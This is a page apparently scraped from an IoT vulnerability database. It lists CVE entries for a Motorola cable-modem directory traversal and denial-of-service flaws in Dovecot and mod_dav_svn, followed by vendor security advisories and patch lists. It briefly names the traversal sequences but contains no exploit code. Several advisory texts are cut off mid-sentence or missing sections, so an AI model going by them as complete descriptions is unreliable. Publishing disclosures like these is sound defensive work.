VARIoT IoT vulnerabilities database
| VAR-201006-0378 | CVE-2010-2307 | Motorola SBV6120E SURFboard Digital Voice Modem Directory Traversal Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. Motorola SBV6120E SURFboard Digital Voice Modem is a data audio modem. Motorola SBV6120E SURFboard Digital Voice Modem incorrectly filters user-submitted URI requests, and remote attackers can exploit the vulnerability to view system file content with WEB permissions.
Exploiting this issue can allow an attacker to obtain sensitive information that may aid in further attacks. ----------------------------------------------------------------------
Secunia CSI integrated with Microsoft WSUS and Microsoft SCCM for 3rd party Patch Management
Free webinars
http://secunia.com/vulnerability_scanning/corporate/webinars/
----------------------------------------------------------------------
TITLE:
Motorola SURFBoard SBV6120E Directory Traversal Vulnerability
SECUNIA ADVISORY ID:
SA40054
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/40054/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=40054
RELEASE DATE:
2010-06-09
DISCUSS ADVISORY:
http://secunia.com/advisories/40054/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/40054/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=40054
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Motorola SURFBoard SBV6120E,
which can be exploited by malicious people to disclose potentially
sensitive information.
The vulnerability is caused due to an error when handling certain
HTTP requests. This can be exploited to e.g.
The vulnerability is reported in firmware version
SBV6X2X-1.0.0.5-SCM-02-SHPC. Other versions may also be affected.
SOLUTION:
Filter malicious requests using a proxy.
PROVIDED AND/OR DISCOVERED BY:
S2 Crew
ORIGINAL ADVISORY:
http://www.exploit-db.com/exploits/12865/
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201105-0095 | CVE-2011-1929 | Dovecot of lib-mail/message-header-parser.c Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message. Dovecot is an open source IMAP and POP3 server for Linux/UNIX-like systems. Dovecot is prone to a denial-of-service vulnerability because it fails to properly parse message headers.
A remote attacker can exploit this issue to crash the affected application, denying service to legitimate users.
Dovecot versions prior to 1.2.17 and 2.0.13 are vulnerable. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: dovecot security update
Advisory ID: RHSA-2011:1187-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1187.html
Issue date: 2011-08-18
CVE Names: CVE-2011-1929
=====================================================================
1. Summary:
Updated dovecot packages that fix one security issue are now available for
Red Hat Enterprise Linux 4, 5, and 6.
The Red Hat Security Response Team has rated this update as having moderate
security impact. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available from the CVE link in
the References section.
2. Relevant releases/architectures:
RHEL Desktop Workstation (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3.
(CVE-2011-1929)
Users of dovecot are advised to upgrade to these updated packages, which
contain a backported patch to resolve this issue. After installing the
updated packages, the dovecot service will be restarted automatically.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
706286 - CVE-2011-1929 dovecot: potential crash when parsing header names that contain NUL characters
6. Package List:
Red Hat Enterprise Linux AS version 4:
Source:
ftp://updates.redhat.com/enterprise/4AS/en/os/SRPMS/dovecot-0.99.11-10.EL4.src.rpm
i386:
dovecot-0.99.11-10.EL4.i386.rpm
dovecot-debuginfo-0.99.11-10.EL4.i386.rpm
ia64:
dovecot-0.99.11-10.EL4.ia64.rpm
dovecot-debuginfo-0.99.11-10.EL4.ia64.rpm
ppc:
dovecot-0.99.11-10.EL4.ppc.rpm
dovecot-debuginfo-0.99.11-10.EL4.ppc.rpm
s390:
dovecot-0.99.11-10.EL4.s390.rpm
dovecot-debuginfo-0.99.11-10.EL4.s390.rpm
s390x:
dovecot-0.99.11-10.EL4.s390x.rpm
dovecot-debuginfo-0.99.11-10.EL4.s390x.rpm
x86_64:
dovecot-0.99.11-10.EL4.x86_64.rpm
dovecot-debuginfo-0.99.11-10.EL4.x86_64.rpm
Red Hat Enterprise Linux Desktop version 4:
Source:
ftp://updates.redhat.com/enterprise/4Desktop/en/os/SRPMS/dovecot-0.99.11-10.EL4.src.rpm
i386:
dovecot-0.99.11-10.EL4.i386.rpm
dovecot-debuginfo-0.99.11-10.EL4.i386.rpm
x86_64:
dovecot-0.99.11-10.EL4.x86_64.rpm
dovecot-debuginfo-0.99.11-10.EL4.x86_64.rpm
Red Hat Enterprise Linux ES version 4:
Source:
ftp://updates.redhat.com/enterprise/4ES/en/os/SRPMS/dovecot-0.99.11-10.EL4.src.rpm
i386:
dovecot-0.99.11-10.EL4.i386.rpm
dovecot-debuginfo-0.99.11-10.EL4.i386.rpm
ia64:
dovecot-0.99.11-10.EL4.ia64.rpm
dovecot-debuginfo-0.99.11-10.EL4.ia64.rpm
x86_64:
dovecot-0.99.11-10.EL4.x86_64.rpm
dovecot-debuginfo-0.99.11-10.EL4.x86_64.rpm
Red Hat Enterprise Linux WS version 4:
Source:
ftp://updates.redhat.com/enterprise/4WS/en/os/SRPMS/dovecot-0.99.11-10.EL4.src.rpm
i386:
dovecot-0.99.11-10.EL4.i386.rpm
dovecot-debuginfo-0.99.11-10.EL4.i386.rpm
ia64:
dovecot-0.99.11-10.EL4.ia64.rpm
dovecot-debuginfo-0.99.11-10.EL4.ia64.rpm
x86_64:
dovecot-0.99.11-10.EL4.x86_64.rpm
dovecot-debuginfo-0.99.11-10.EL4.x86_64.rpm
RHEL Desktop Workstation (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/dovecot-1.0.7-7.el5_7.1.src.rpm
i386:
dovecot-1.0.7-7.el5_7.1.i386.rpm
dovecot-debuginfo-1.0.7-7.el5_7.1.i386.rpm
x86_64:
dovecot-1.0.7-7.el5_7.1.x86_64.rpm
dovecot-debuginfo-1.0.7-7.el5_7.1.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/dovecot-1.0.7-7.el5_7.1.src.rpm
i386:
dovecot-1.0.7-7.el5_7.1.i386.rpm
dovecot-debuginfo-1.0.7-7.el5_7.1.i386.rpm
ia64:
dovecot-1.0.7-7.el5_7.1.ia64.rpm
dovecot-debuginfo-1.0.7-7.el5_7.1.ia64.rpm
ppc:
dovecot-1.0.7-7.el5_7.1.ppc.rpm
dovecot-debuginfo-1.0.7-7.el5_7.1.ppc.rpm
s390x:
dovecot-1.0.7-7.el5_7.1.s390x.rpm
dovecot-debuginfo-1.0.7-7.el5_7.1.s390x.rpm
x86_64:
dovecot-1.0.7-7.el5_7.1.x86_64.rpm
dovecot-debuginfo-1.0.7-7.el5_7.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/dovecot-2.0.9-2.el6_1.1.src.rpm
i386:
dovecot-2.0.9-2.el6_1.1.i686.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.i686.rpm
dovecot-mysql-2.0.9-2.el6_1.1.i686.rpm
dovecot-pgsql-2.0.9-2.el6_1.1.i686.rpm
dovecot-pigeonhole-2.0.9-2.el6_1.1.i686.rpm
ppc64:
dovecot-2.0.9-2.el6_1.1.ppc.rpm
dovecot-2.0.9-2.el6_1.1.ppc64.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.ppc.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.ppc64.rpm
dovecot-mysql-2.0.9-2.el6_1.1.ppc64.rpm
dovecot-pgsql-2.0.9-2.el6_1.1.ppc64.rpm
dovecot-pigeonhole-2.0.9-2.el6_1.1.ppc64.rpm
s390x:
dovecot-2.0.9-2.el6_1.1.s390.rpm
dovecot-2.0.9-2.el6_1.1.s390x.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.s390.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.s390x.rpm
dovecot-mysql-2.0.9-2.el6_1.1.s390x.rpm
dovecot-pgsql-2.0.9-2.el6_1.1.s390x.rpm
dovecot-pigeonhole-2.0.9-2.el6_1.1.s390x.rpm
x86_64:
dovecot-2.0.9-2.el6_1.1.i686.rpm
dovecot-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.i686.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-mysql-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-pgsql-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-pigeonhole-2.0.9-2.el6_1.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/dovecot-2.0.9-2.el6_1.1.src.rpm
i386:
dovecot-debuginfo-2.0.9-2.el6_1.1.i686.rpm
dovecot-devel-2.0.9-2.el6_1.1.i686.rpm
ppc64:
dovecot-debuginfo-2.0.9-2.el6_1.1.ppc64.rpm
dovecot-devel-2.0.9-2.el6_1.1.ppc64.rpm
s390x:
dovecot-debuginfo-2.0.9-2.el6_1.1.s390x.rpm
dovecot-devel-2.0.9-2.el6_1.1.s390x.rpm
x86_64:
dovecot-debuginfo-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-devel-2.0.9-2.el6_1.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/dovecot-2.0.9-2.el6_1.1.src.rpm
i386:
dovecot-2.0.9-2.el6_1.1.i686.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.i686.rpm
dovecot-mysql-2.0.9-2.el6_1.1.i686.rpm
dovecot-pgsql-2.0.9-2.el6_1.1.i686.rpm
dovecot-pigeonhole-2.0.9-2.el6_1.1.i686.rpm
x86_64:
dovecot-2.0.9-2.el6_1.1.i686.rpm
dovecot-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.i686.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-mysql-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-pgsql-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-pigeonhole-2.0.9-2.el6_1.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/dovecot-2.0.9-2.el6_1.1.src.rpm
i386:
dovecot-debuginfo-2.0.9-2.el6_1.1.i686.rpm
dovecot-devel-2.0.9-2.el6_1.1.i686.rpm
x86_64:
dovecot-debuginfo-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-devel-2.0.9-2.el6_1.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-1929.html
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOTW29XlSAg2UNWIIRAr8LAKCu85vT3BXBKZ1SRebWK7B9nG6OFQCfYR3k
P3AdaDf2BpXnEhk2OL5DTpo=
=eG31
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201110-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Dovecot: Multiple vulnerabilities
Date: October 10, 2011
Bugs: #286844, #293954, #314533, #368653
ID: 201110-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities were found in Dovecot, the worst of which
allowing for remote execution of arbitrary code.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-mail/dovecot < 2.0.13 *>= 1.2.17
>= 2.0.13
Description
===========
Multiple vulnerabilities have been discovered in Dovecot. Please review
the CVE identifiers referenced below for details.
Impact
======
A remote attacker could exploit these vulnerabilities to cause the
remote execution of arbitrary code, or a Denial of Service condition,
to conduct directory traversal attacks, corrupt data, or disclose
information.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Dovecot 1 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/dovecot-1.2.17"
All Dovecot 2 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/dovecot-2.0.13"
NOTE: This is a legacy GLSA. Updates for all affected architectures are
available since May 28, 2011. It is likely that your system is already
no longer affected by this issue.
References
==========
[ 1 ] CVE-2009-3235
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3235
[ 2 ] CVE-2009-3897
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3897
[ 3 ] CVE-2010-0745
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0745
[ 4 ] CVE-2010-3304
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3304
[ 5 ] CVE-2010-3706
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3706
[ 6 ] CVE-2010-3707
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3707
[ 7 ] CVE-2010-3779
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3779
[ 8 ] CVE-2010-3780
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3780
[ 9 ] CVE-2011-1929
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1929
[ 10 ] CVE-2011-2166
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2166
[ 11 ] CVE-2011-2167
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2167
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-04.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
.
Packages for 2009.0 are provided as of the Extended Maintenance
Program. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFN3e9VmqjQ0CJFipgRAjwfAJ95TzNOzqcOHVs9I3gIj1PqbuH6+gCfaxLM
TC22GorN3moiTA4Ska8YOLU=
=2Q1M
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ==========================================================================
Ubuntu Security Notice USN-1143-1
June 02, 2011
dovecot vulnerability
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
Summary:
An attacker could send a crafted email message that could disrupt email
service.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 11.04:
dovecot-common 1:1.2.15-3ubuntu2.1
Ubuntu 10.10:
dovecot-common 1:1.2.12-1ubuntu8.2
Ubuntu 10.04 LTS:
dovecot-common 1:1.2.9-1ubuntu6.4
In general, a standard system update will make all the necessary changes.
The oldstable distribution (lenny) is not affected.
For the stable distribution (squeeze), this problem has been fixed in
version 1.2.15-7.
For the unstable distribution (sid), this problem has been fixed in
version 2.0.13-1
| VAR-201106-0192 | CVE-2011-1783 | Apache Subversion Used in Apache HTTP Server Service disruption in (DoS) Vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data. The server is fast, reliable and extensible through a simple API.
The mod_dav_svn Apache HTTPD server module may in certain cenarios
enter a logic loop which does not exit and which allocates emory in
each iteration, ultimately exhausting all the available emory on the
server which can lead to a DoS (Denial Of Service) (CVE-2011-1783).
The mod_dav_svn Apache HTTPD server module may leak to remote users
the file contents of files configured to be unreadable by those users
(CVE-2011-1921).
Packages for 2009.0 are provided as of the Extended Maintenance
Program. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFN6cg2mqjQ0CJFipgRAqj2AKCRyKt813e0OmWSTU5bL58KCmUwowCfT6RY
DDOtowgSctAg4EX+tLXIvRQ=
=zsmM
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-02-01-1 OS X Lion v10.7.3 and Security Update 2012-001
OS X Lion v10.7.3 and Security Update 2012-001 is now available and
addresses the following:
Address Book
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: An attacker in a privileged network position may intercept
CardDAV data
Description: Address Book supports Secure Sockets Layer (SSL) for
accessing CardDAV. A downgrade issue caused Address Book to attempt
an unencrypted connection if an encrypted connection failed. An
attacker in a privileged network position could abuse this behavior
to intercept CardDAV data. This issue is addressed by not downgrading
to an unencrypted connection without user approval.
CVE-ID
CVE-2011-3444 : Bernard Desruisseaux of Oracle Corporation
Apache
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Multiple vulnerabilities in Apache
Description: Apache is updated to version 2.2.21 to address several
vulnerabilities, the most serious of which may lead to a denial of
service. Further information is available via the Apache web site at
http://httpd.apache.org/
CVE-ID
CVE-2011-3348
Apache
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode.
Apache disabled the 'empty fragment' countermeasure which prevented
these attacks. This issue is addressed by providing a configuration
parameter to control the countermeasure and enabling it by default.
CVE-ID
CVE-2011-3389
CFNetwork
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: Visiting a maliciously crafted website may lead to the
disclosure of sensitive information
Description: An issue existed in CFNetwork's handling of malformed
URLs. When accessing a maliciously crafted URL, CFNetwork could send
the request to an incorrect origin server. This issue does not affect
systems prior to OS X Lion.
CVE-ID
CVE-2011-3246 : Erling Ellingsen of Facebook
CFNetwork
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: Visiting a maliciously crafted website may lead to the
disclosure of sensitive information
Description: An issue existed in CFNetwork's handling of malformed
URLs. When accessing a maliciously crafted URL, CFNetwork could send
unexpected request headers. This issue does not affect systems prior
to OS X Lion.
CVE-ID
CVE-2011-3447 : Erling Ellingsen of Facebook
ColorSync
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Viewing a maliciously crafted image with an embedded
ColorSync profile may lead to an unexpected application termination
or arbitrary code execution
Description: An integer overflow existed in the handling of images
with an embedded ColorSync profile, which may lead to a heap buffer
overflow. This issue does not affect OS X Lion systems.
CVE-ID
CVE-2011-0200 : binaryproof working with TippingPoint's Zero Day
Initiative
CoreAudio
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Playing maliciously crafted audio content may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of AAC
encoded audio streams. This issue does not affect OS X Lion systems.
CVE-ID
CVE-2011-3252 : Luigi Auriemma working with TippingPoint's Zero Day
Initiative
CoreMedia
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A heap buffer overflow existed in CoreMedia's handling
of H.264 encoded movie files.
CVE-ID
CVE-2011-3448 : Scott Stender of iSEC Partners
CoreText
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing or downloading a document containing a maliciously
crafted embedded font may lead to an unexpected application
termination or arbitrary code execution
Description: A use after free issue existed in the handling of font
files.
CVE-ID
CVE-2011-3449 : Will Dormann of the CERT/CC
CoreUI
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: Visiting a malicious website may lead to an unexpected
application termination or arbitrary code execution
Description: An unbounded stack allocation issue existed in the
handling of long URLs. This issue does not affect systems prior to OS
X Lion.
CVE-ID
CVE-2011-3450 : Ben Syverson
curl
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: A remote server may be able to impersonate clients via
GSSAPI requests
Description: When doing GSSAPI authentication, libcurl
unconditionally performs credential delegation. This issue is
addressed by disabling GSSAPI credential delegation.
CVE-ID
CVE-2011-2192
Data Security
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: An attacker with a privileged network position may intercept
user credentials or other sensitive information
Description: Two certificate authorities in the list of trusted root
certificates have independently issued intermediate certificates to
DigiCert Malaysia. DigiCert Malaysia has issued certificates with
weak keys that it is unable to revoke. An attacker with a privileged
network position could intercept user credentials or other sensitive
information intended for a site with a certificate issued by DigiCert
Malaysia. This issue is addressed by configuring default system trust
settings so that DigiCert Malaysia's certificates are not trusted. We
would like to acknowledge Bruce Morton of Entrust, Inc. for reporting
this issue.
dovecot
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode.
Dovecot disabled the 'empty fragment' countermeasure which prevented
these attacks. This issue is addressed by enabling the
countermeasure.
CVE-ID
CVE-2011-3389 : Apple
filecmds
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Decompressing a maliciously crafted compressed file may lead
to an unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the 'uncompress' command
line tool.
CVE-ID
CVE-2011-2895
ImageIO
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in ImageIO's handling of
CCITT Group 4 encoded TIFF files. This issue does not affect OS X
Lion systems.
CVE-ID
CVE-2011-0241 : Cyril CATTIAUX of Tessi Technologies
ImageIO
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of
ThunderScan encoded TIFF images. This issue is address by updating
libtiff to version 3.9.5.
CVE-ID
CVE-2011-1167
ImageIO
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Multiple vulnerabilities in libpng 1.5.4
Description: libpng is updated to version 1.5.5 to address multiple
vulnerabilities, the most serious of which may lead to arbitrary code
execution. Further information is available via the libpng website at
http://www.libpng.org/pub/png/libpng.html
CVE-ID
CVE-2011-3328
Internet Sharing
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: A Wi-Fi network created by Internet Sharing may lose
security settings after a system update
Description: After updating to a version of OS X Lion prior to
10.7.3, the Wi-Fi configuration used by Internet Sharing may revert
to factory defaults, which disables the WEP password. This issue only
affects systems with Internet Sharing enabled and sharing the
connection to Wi-Fi. This issue is addressed by preserving the Wi-Fi
configuration during a system update.
CVE-ID
CVE-2011-3452 : an anonymous researcher
Libinfo
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: Visiting a maliciously crafted website may lead to the
disclosure of sensitive information
Description: An issue existed in Libinfo's handling of hostname
lookup requests. Libinfo could return incorrect results for a
maliciously crafted hostname. This issue does not affect systems
prior to OS X Lion.
CVE-ID
CVE-2011-3441 : Erling Ellingsen of Facebook
libresolv
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Applications that use OS X's libresolv library may be
vulnerable to an unexpected application termination or arbitrary code
execution
Description: An integer overflow existed in the parsing of DNS
resource records, which may lead to heap memory corruption.
CVE-ID
CVE-2011-3453 : Ilja van Sprundel of IOActive
libsecurity
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
